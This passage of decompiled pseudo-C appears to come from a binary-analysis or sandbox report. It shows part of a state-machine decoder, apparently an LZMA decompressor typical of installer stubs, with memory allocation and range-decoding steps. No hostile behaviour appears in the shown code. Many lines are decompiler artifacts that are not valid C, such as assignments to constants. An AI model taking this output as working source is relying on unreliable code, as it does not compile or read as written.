                          							_t535 = GlobalAlloc(0x40, 0x600); // executed
                          							 *(_t613 - 4) = _t535;
                          							if(_t535 == 0) {
                          								goto L171;
                          							} else {
                          								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          								goto L10;
                          							}
                          						case 1:
                          							L13:
                          							__eflags =  *(_t613 - 0x6c);
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 1;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          							_t45 = _t613 - 0x48;
                          							 *_t45 =  *(_t613 - 0x48) + 1;
                          							__eflags =  *_t45;
                          							L15:
                          							if( *(_t613 - 0x48) < 4) {
                          								goto L13;
                          							}
                          							_t547 =  *(_t613 - 0x40);
                          							if(_t547 ==  *(_t613 - 0x74)) {
                          								L20:
                          								 *(_t613 - 0x48) = 5;
                          								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          								goto L23;
                          							}
                          							 *(_t613 - 0x74) = _t547;
                          							if( *(_t613 - 8) != 0) {
                          								GlobalFree( *(_t613 - 8)); // executed
                          							}
                          							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                          							 *(_t613 - 8) = _t535;
                          							if(_t535 == 0) {
                          								goto L171;
                          							} else {
                          								goto L20;
                          							}
                          						case 2:
                          							L24:
                          							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                          							 *(_t613 - 0x84) = 6;
                          							 *(_t613 - 0x4c) = _t554;
                          							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                          							goto L132;
                          						case 3:
                          							L21:
                          							__eflags =  *(_t613 - 0x6c);
                          							if( *(_t613 - 0x6c) == 0) {
                          								 *(_t613 - 0x88) = 3;
                          								goto L170;
                          							}
                          							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          							_t67 = _t613 - 0x70;
                          							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                          							__eflags =  *_t67;
                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          							L23:
                          							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                          							if( *(_t613 - 0x48) != 0) {
                          								goto L21;
                          							}
                          							goto L24;
                          						case 4:
                          							goto L133;
                          						case 5:
                          							goto L137;
                          						case 6:
                          							__edx = 0;
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x34) = 1;
                          								 *(__ebp - 0x84) = 7;
                          								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                          							__esi =  *(__ebp - 0x60);
                          							__cl = 8;
                          							__cl = 8 -  *(__ebp - 0x3c);
                          							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                          							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                          							__ecx =  *(__ebp - 0x3c);
                          							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                          							__ecx =  *(__ebp - 4);
                          							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                          							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                          							__eflags =  *(__ebp - 0x38) - 4;
                          							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                          							if( *(__ebp - 0x38) >= 4) {
                          								__eflags =  *(__ebp - 0x38) - 0xa;
                          								if( *(__ebp - 0x38) >= 0xa) {
                          									_t98 = __ebp - 0x38;
                          									 *_t98 =  *(__ebp - 0x38) - 6;
                          									__eflags =  *_t98;
                          								} else {
                          									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                          								}
                          							} else {
                          								 *(__ebp - 0x38) = 0;
                          							}
                          							__eflags =  *(__ebp - 0x34) - __edx;
                          							if( *(__ebp - 0x34) == __edx) {
                          								__ebx = 0;
                          								__ebx = 1;
                          								goto L61;
                          							} else {
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__ecx =  *(__ebp - 8);
                          								__ebx = 0;
                          								__ebx = 1;
                          								__al =  *((intOrPtr*)(__eax + __ecx));
                          								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                          								goto L41;
                          							}
                          						case 7:
                          							__eflags =  *(__ebp - 0x40) - 1;
                          							if( *(__ebp - 0x40) != 1) {
                          								__eax =  *(__ebp - 0x24);
                          								 *(__ebp - 0x80) = 0x16;
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x28);
                          								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          								__eax =  *(__ebp - 0x2c);
                          								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          								__eax = 0;
                          								__eflags =  *(__ebp - 0x38) - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          								__eax =  *(__ebp - 4);
                          								__eax =  *(__ebp - 4) + 0x664;
                          								__eflags = __eax;
                          								 *(__ebp - 0x58) = __eax;
                          								goto L69;
                          							}
                          							__eax =  *(__ebp - 4);
                          							__ecx =  *(__ebp - 0x38);
                          							 *(__ebp - 0x84) = 8;
                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          							goto L132;
                          						case 8:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xa;
                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          							} else {
                          								__eax =  *(__ebp - 0x38);
                          								__ecx =  *(__ebp - 4);
                          								__eax =  *(__ebp - 0x38) + 0xf;
                          								 *(__ebp - 0x84) = 9;
                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          							}
                          							goto L132;
                          						case 9:
                          							goto L0;
                          						case 0xa:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xb;
                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x28);
                          							goto L88;
                          						case 0xb:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__ecx =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x20);
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          							} else {
                          								__eax =  *(__ebp - 0x24);
                          							}
                          							__ecx =  *(__ebp - 0x28);
                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          							L88:
                          							__ecx =  *(__ebp - 0x2c);
                          							 *(__ebp - 0x2c) = __eax;
                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          							goto L89;
                          						case 0xc:
                          							L99:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xc;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t334 = __ebp - 0x70;
                          							 *_t334 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t334;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							__eax =  *(__ebp - 0x2c);
                          							goto L101;
                          						case 0xd:
                          							L37:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xd;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t122 = __ebp - 0x70;
                          							 *_t122 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t122;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L39:
                          							__eax =  *(__ebp - 0x40);
                          							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          								goto L48;
                          							}
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								goto L54;
                          							}
                          							L41:
                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          							 *(__ebp - 0x48) = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								 *(__ebp - 0x40) = 1;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L39;
                          							} else {
                          								goto L37;
                          							}
                          						case 0xe:
                          							L46:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xe;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t156 = __ebp - 0x70;
                          							 *_t156 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t156;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							while(1) {
                          								L48:
                          								__eflags = __ebx - 0x100;
                          								if(__ebx >= 0x100) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x58);
                          								__edx = __ebx + __ebx;
                          								__ecx =  *(__ebp - 0x10);
                          								__esi = __edx + __eax;
                          								__ecx =  *(__ebp - 0x10) >> 0xb;
                          								__ax =  *__esi;
                          								 *(__ebp - 0x54) = __esi;
                          								__edi = __ax & 0x0000ffff;
                          								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          								__eflags =  *(__ebp - 0xc) - __ecx;
                          								if( *(__ebp - 0xc) >= __ecx) {
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          									__cx = __ax;
                          									_t170 = __edx + 1; // 0x1
                          									__ebx = _t170;
                          									__cx = __ax >> 5;
                          									__eflags = __eax;
                          									 *__esi = __ax;
                          								} else {
                          									 *(__ebp - 0x10) = __ecx;
                          									0x800 = 0x800 - __edi;
                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          									__ebx = __ebx + __ebx;
                          									 *__esi = __cx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									continue;
                          								} else {
                          									goto L46;
                          								}
                          							}
                          							L54:
                          							_t173 = __ebp - 0x34;
                          							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          							__eflags =  *_t173;
                          							goto L55;
                          						case 0xf:
                          							L58:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xf;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t203 = __ebp - 0x70;
                          							 *_t203 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t203;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L60:
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								L55:
                          								__al =  *(__ebp - 0x44);
                          								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          								goto L56;
                          							}
                          							L61:
                          							__eax =  *(__ebp - 0x58);
                          							__edx = __ebx + __ebx;
                          							__ecx =  *(__ebp - 0x10);
                          							__esi = __edx + __eax;
                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								_t217 = __edx + 1; // 0x1
                          								__ebx = _t217;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L60;
                          							} else {
                          								goto L58;
                          							}
                          						case 0x10:
                          							L109:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x10;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t365 = __ebp - 0x70;
                          							 *_t365 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t365;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							goto L111;
                          						case 0x11:
                          							goto L69;
                          						case 0x12:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 0x58);
                          								 *(__ebp - 0x84) = 0x13;
                          								__esi =  *(__ebp - 0x58) + 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							__eflags = __eax;
                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                          							goto L130;
                          						case 0x13:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								_t469 = __ebp - 0x58;
                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                          								__eflags =  *_t469;
                          								 *(__ebp - 0x30) = 0x10;
                          								 *(__ebp - 0x40) = 8;
                          								L144:
                          								 *(__ebp - 0x7c) = 0x14;
                          								goto L145;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							 *(__ebp - 0x30) = 8;
                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          							L130:
                          							 *(__ebp - 0x58) = __eax;
                          							 *(__ebp - 0x40) = 3;
                          							goto L144;
                          						case 0x14:
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          							__eax =  *(__ebp - 0x80);
                          							goto L140;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          							goto L120;
                          						case 0x16:
                          							__eax =  *(__ebp - 0x30);
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx =  *(__ebp - 4);
                          							 *(__ebp - 0x40) = 6;
                          							__eax = __eax << 7;
                          							 *(__ebp - 0x7c) = 0x19;
                          							 *(__ebp - 0x58) = __eax;
                          							goto L145;
                          						case 0x17:
                          							L145:
                          							__eax =  *(__ebp - 0x40);
                          							 *(__ebp - 0x50) = 1;
                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          							goto L149;
                          						case 0x18:
                          							L146:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x18;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t484 = __ebp - 0x70;
                          							 *_t484 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t484;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L148:
                          							_t487 = __ebp - 0x48;
                          							 *_t487 =  *(__ebp - 0x48) - 1;
                          							__eflags =  *_t487;
                          							L149:
                          							__eflags =  *(__ebp - 0x48);
                          							if( *(__ebp - 0x48) <= 0) {
                          								__ecx =  *(__ebp - 0x40);
                          								__ebx =  *(__ebp - 0x50);
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          								__eax =  *(__ebp - 0x7c);
                          								 *(__ebp - 0x44) = __ebx;
                          								goto L140;
                          							}
                          							__eax =  *(__ebp - 0x50);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          							__eax =  *(__ebp - 0x58);
                          							__esi = __edx + __eax;
                          							 *(__ebp - 0x54) = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								 *(__ebp - 0x50) = __edx;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L148;
                          							} else {
                          								goto L146;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								 *(__ebp - 0x2c) = __ebx;
                          								L119:
                          								_t393 = __ebp - 0x2c;
                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                          								__eflags =  *_t393;
                          								L120:
                          								__eax =  *(__ebp - 0x2c);
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          									goto L170;
                          								}
                          								__eflags = __eax -  *(__ebp - 0x60);
                          								if(__eax >  *(__ebp - 0x60)) {
                          									goto L171;
                          								}
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          								__eax =  *(__ebp - 0x30);
                          								_t400 = __ebp - 0x60;
                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          								__eflags =  *_t400;
                          								goto L123;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							 *(__ebp - 0x2c) = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								 *(__ebp - 0x48) = __ecx;
                          								L102:
                          								__eflags =  *(__ebp - 0x48);
                          								if( *(__ebp - 0x48) <= 0) {
                          									__eax = __eax + __ebx;
                          									 *(__ebp - 0x40) = 4;
                          									 *(__ebp - 0x2c) = __eax;
                          									__eax =  *(__ebp - 4);
                          									__eax =  *(__ebp - 4) + 0x644;
                          									__eflags = __eax;
                          									L108:
                          									__ebx = 0;
                          									 *(__ebp - 0x58) = __eax;
                          									 *(__ebp - 0x50) = 1;
                          									 *(__ebp - 0x44) = 0;
                          									 *(__ebp - 0x48) = 0;
                          									L112:
                          									__eax =  *(__ebp - 0x40);
                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          										_t391 = __ebp - 0x2c;
                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          										__eflags =  *_t391;
                          										goto L119;
                          									}
                          									__eax =  *(__ebp - 0x50);
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          									__eax =  *(__ebp - 0x58);
                          									__esi = __edi + __eax;
                          									 *(__ebp - 0x54) = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          									__eflags =  *(__ebp - 0xc) - __edx;
                          									if( *(__ebp - 0xc) >= __edx) {
                          										__ecx = 0;
                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          										__ecx = 1;
                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          										__ebx = 1;
                          										__ecx =  *(__ebp - 0x48);
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx =  *(__ebp - 0x44);
                          										__ebx =  *(__ebp - 0x44) | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										 *(__ebp - 0x44) = __ebx;
                          										 *__esi = __ax;
                          										 *(__ebp - 0x50) = __edi;
                          									} else {
                          										 *(__ebp - 0x10) = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                          									if( *(__ebp - 0x10) >= 0x1000000) {
                          										L111:
                          										_t368 = __ebp - 0x48;
                          										 *_t368 =  *(__ebp - 0x48) + 1;
                          										__eflags =  *_t368;
                          										goto L112;
                          									} else {
                          										goto L109;
                          									}
                          								}
                          								__ecx =  *(__ebp - 0xc);
                          								__ebx = __ebx + __ebx;
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          									__ecx =  *(__ebp - 0x10);
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									 *(__ebp - 0x44) = __ebx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									L101:
                          									_t338 = __ebp - 0x48;
                          									 *_t338 =  *(__ebp - 0x48) - 1;
                          									__eflags =  *_t338;
                          									goto L102;
                          								} else {
                          									goto L99;
                          								}
                          							}
                          							__edx =  *(__ebp - 4);
                          							__eax = __eax - __ebx;
                          							 *(__ebp - 0x40) = __ecx;
                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          							goto L108;
                          						case 0x1a:
                          							L56:
                          							__eflags =  *(__ebp - 0x64);
                          							if( *(__ebp - 0x64) == 0) {
                          								 *(__ebp - 0x88) = 0x1a;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x68);
                          							__al =  *(__ebp - 0x5c);
                          							__edx =  *(__ebp - 8);
